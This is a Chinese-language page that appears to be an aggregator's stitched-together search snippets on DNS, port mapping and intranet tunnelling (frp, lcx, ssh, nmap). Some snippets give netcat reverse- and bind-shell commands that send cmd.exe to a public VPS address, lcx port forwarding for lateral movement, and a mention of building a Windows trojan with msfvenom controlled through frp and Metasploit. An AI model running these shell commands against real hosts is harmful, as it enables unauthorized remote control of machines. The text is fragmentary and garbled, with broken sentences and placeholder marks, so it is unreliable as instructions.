在操作系统中,53 端口被视为 DNS 服务的标准端口(TCP/UDP 服务),853 端口被视为 DNS over TLS 的标准端口(TCP 服务)。...私有域名解析,即内网域名系统在内网安全中发挥着举足轻重的作用。 用途 笔者在实际使用 AWS、Azure、Oracle、阿里云、腾讯云、Ucloud 的过程中,也发现了私有域名解析的应用。...其实,小集群或者小团队内网可以采用“合二为一”的方案,即递归 DNS 与权威 DNS 由一台服务器来同时提供。由于小集群内网私有域名解析和公有域名解析不需要接近于零的宕机率,所以完全可以最简化。...另外,如果原来就有 Nginx 或其他服务占用了 80 端口,我们在配置端口映射的时候可能就会设置到另外一个端口,因此自动跳转到的页面并非是 AdGuard Home 的首页。...我们需要使用 IP + 映射 80 的端口来定位到首页。
工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...注:如果客户端【相当于内网】连接服务器【相当于外网】,想获取服务器的shell,那么称为正向shell,如果是客户端连接服务器,服务器端想获取客户端的shell,那么称为反向shell,另外有关于nc在
域名解析 需求 现有两个二级域名nginx.huangminhang.cn 和 api.huangminhang.cn,现在需要把nginx.huangminhang.cn"映射"到80端口,api.huangminhang.cn..."映射"82端口 开始 因为域名解析默认的都是80端口,所以要实现实现需求,只能在Nginx上,将对应的域名转到指定的端口 修改Nginx配置 server {
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面...8888 //在公网服务器上面执行此命令,接受来自内网的信息,将信息反馈到公网的8888端口; 当我们端口转发成功后,在公网服务器上面会反弹一个cmd的命令窗口,这个就是内网服务器的,在上面可以执行系统命令...用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。...msfvenom 获取反弹一句话 MSF渗透测试框架除了常规的端口扫描、口令爆破、抓包、提权等操作,还可以作为生成一句话反弹shell的工具。我们需要在MSF上面查询到各类的路径信息。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 -p1 -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...)的9898端口 ?
工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...其中frpc_full.ini(frps_full.ini)是全配置文件,里面包含了所有的配置,当然我们只需要其中的一部分复制到frpc.ini(frps.ini)即可 ?...= admin #HTTP代理端口 vhost_http_port = 10080 #HTTPS代理端口 vhost_https_port = 10443 然后运行....#服务名称(自定义) [ssh] #转发协议类型 type = tcp #本地地址 local_ip = 127.0.0.1 #本地端口 local_port = 22 #远程端口 remote_port...此时frp隧道已经建立成功,可以通过访问vps的ip:7001就相当于访问了本地的22端口
DNS使用TCP和UDP端口53。 当前,对于每一级域名长度的限制是63个字符,域名总长度则不能超过253个字符。
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP...“local_port”是本地应用的端口号,按照实际应用工作在本机的端口号填写即可。 “remote_port”是该条规则在服务端开放的端口号,自己填写并记录即可。...四、Metasploit渗透windows测试 4.1环境 内网kali攻击机 公网vps 链接手机热点的win10电脑 4.2 msfvenom制作Windows木马程序 由于只是测试frp反向代理+...内网穿透+ Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。...,与frpc中的local_port一致 4.4Windows端运行木马 Windows端运行木马,kali端发现win10主机上线成功,控制win10 至此, 反向代理+内网穿透+ Metasploit
,那就添加内网域名解析到hosts或者参考如下方法配置。...添加内网域名解析到hosts,如下代码存储为.bat文件执行set datemine=%date:~0,4%%date:~5,2%%date:~8,2%echo;%time:~0,1%|find " "...hostsecho 169.254.0.138 notify.tat.tencent-cloud.com>> c:\windows\system32\drivers\etc\hosts利用bind实现内网域名解析走内网默认...dns,其他域名解析走公网公共dns或自建dns云平台不允许私搭公网dns,得确保自己搞了dns服务后,公网不能访问53端口才行,因此有必要一开始就在安全组限制公网53端口,只放行内网53端口,安全组参考下图图片...修改默认内网DNS会导致内网域名解析出问题,影响云监控和云安全组件正常工作,还会影响Windows激活等涉及内网域名的服务。
工具 Frp是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...修改成服务端Ip server_addr = x.x.x.x server_port = 7000 [rdp] type = tcp local_ip = 127.0.0.1 # 修改成RDP协议的端口
############################################################# 通过nmap端口扫描获取开放的端口,以达到内网体检的目的 ##########...2、nmap对这个主机列表进行端口扫描 # 注意:刚开始没显式指定端口范围,发现例如27017这些端口都没扫描出来,后来就加了-p 1-65535参数,但是发现扫描特别慢,慎重考虑。...22/tcp open ssh Nmap scan report for node3 (192.168.2.13) 22/tcp open ssh 3、每天执行一次下面的这个脚本,获取最新的开放的端口...,并比对旧的数据,发现端口异动就自动报警。...4、如果确定当前端口是正常流程修改的,可以更新端口列表模板 cp /tmp/list_$(date +%F) /tmp/list 基本上完成这几步骤,就差不多了,还有很多不完善的地方,等想到了在补充进来
端口映射:端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。...当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。...于是我们可以在路由器上设置一个端口映射,只要外网用户访问路由器ip的80端口,那么路由器会把自动把流量转到内网Web服务器的80端口上。...在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全 端口转发:端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。...这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。
type = tcp local_ip = 127.0.0.1 local_port = 3210 remote_port = 12316 这个配置文件的含义是,当我们访问服务器的公网IP+12316端口就相当于访问我们本地电脑的...3210端口。...至此,frp的配置就大功告成了,我们现在成功的把内网的3210端口暴露给了外网。
FRP内网穿透应用场景:本地Web服务外网访问、本地开发微信、本地联调支付宝\微信支付、TCP/UDP端口转发 在本机开发好的网站想让客户测试不在需要上传到服务器上面,使用FRP内外网穿透轻松解决;微信开发也不需要在上传到服务器...,使用免费FRP内网穿透服务器帮您解决80端口问题,实现微信服务器直接访问到您本机web服务。...使用frp作为内网穿透的时候,有时候,我们需要多个端口穿透,怎么配置呢? FRP内内网穿透应用场景 思考: 我们知道frp要想内网穿透,需要配置服务端和客户端。...如果需要直接访问80端口的话,需要还需要在nginx做配置。...在Proxies菜单下,点击TCP,可以看到对应的端口。如下图所示: frp管理界面查看启动的三个不同端口
使用frp作为内网穿透的时候,有时候,我们需要多个端口穿透,怎么配置呢? 思考: 我们知道frp要想内网穿透,需要配置服务端和客户端。如果需要直接访问80端口的话,需要还需要在nginx做配置。...#端口8079是博客管理后台的项目 [tcp_blog-admin] type = tcp local_port = 8079 listen_port = 8079 #端口8080是博客前台项目访问地址...$ { expires 1d; } } # 端口8079映射到80端口 server { listen 80; server_name blog-admin.mmmm.com...$ { expires 1d; } } # 端口8082映射到80端口 server { listen 80; server_name app3.nnn.com...在Proxies菜单下,点击TCP,可以看到对应的端口。如下图所示:
更改默认DNS后,激活等内网域名相关的服务比如云监控、云镜、ntp、update 等通过加hosts方式实现 建议执行命令加hosts之前,先在正常没改dns的同类型机器得到最实时的IP(比如给基础网络机器加...s.yd.qcloud.com、l.yd.qcloud.com、u.yd.qcloud.com ,云镜的3个内网域名对应的IP经常变,摸不清规律,以实测的为准,建议在同子网里购买个按量机器并把dns改回
有时有些机器部署在内网,有关内网ubuntu如何通过fiddler代理执行apt命令、下载docker镜像的问题可以参考笔者的其他文章:https://blog.csdn.net/john1337/category..._10165743.html 本文就不再介绍其他内容,只介绍内网ubuntu如何通过自建的dns服务进行域名解析的步骤 1、在代理机器上安装coredns服务,coredns使用很简单,执行可执行文件即可...6、重启域名解析服务:systemctl restart systemd-resolved.service 7、测试效果:
我们局域网的机器能够访问外网,但是外网不能访问内网。因为内网访问互联网时候能确定外网的地址,外网却不能确定我们局域网内的具体地址。...(ip地址有限)如果 我们在访问外网的时候,这个链接让他保持、不断,那么这个链接就相当于我们建了一条路,内网数据能出去,外网数据能进来,ssh也是这个方法。...:ssh -NTf -R 8888:127.0.0.1:8080 root@host 3、参数说明 -C 允许压缩数据 -f 后台运行 -N 表示只连接远程主机,不打开远程shell -R 将端口绑定到远程服务器...,反向代理 -L 将端口绑定到本地客户端,正向代理 -T 不为这个连接分配TTY -NT 代表这个SSH连接只用来传数据,不执行远程操作 保持ssh链接不断开 通常我们使用ssh 链接服务器的时候...remote-port> user@host done 保证断开后立马就能连上把-f参数去掉 否则就死循环了 方法四、使用autossh 需要下载autossh软件,操作和直接使用ssh 差不多 -M是监听端口
就好像这样的 注意这个网址栏,就是lan加端口号,这样大大的方便了我们平时在本地的测试,不需要再输入一长串的127.0.0.1之类的,也比localhost要短对不,更主要的还是看着厉害呀。
内网穿透的技术有很多,常用的方法有: ssh/autossh ngfork frp (本文将介绍该方法) github地址:https://github.com/fatedier/frp frp为传统的...C/S结构,可分为客户端和服务端,其中 frpc(客户端) 运行在内网环境 frps(服务端)运行在有公网IP的服务器 image.png 编写frpc.ini文件,例如: [common] server_addr...= 公网IP server_port = frps运行的端口 token = 一串随机字符用来防止未经授权的使用 [appName] type = tcp local_ip = 127.0.0.1...local_port = 需要映射的本地端口 remote_port = 映射成公网服务器的端口 服务器端frps.ini就更简单了 [common] bind_port = 服务端运行的端口...)把本机的80端口映射成了38888端口,则链路如下 192.168.1.5:80 1.2.3.4:34567 1.2.3.4:38888 提高映射服务可靠性 请使用supervisor
领取专属 10元无门槛券
手把手带您无忧上云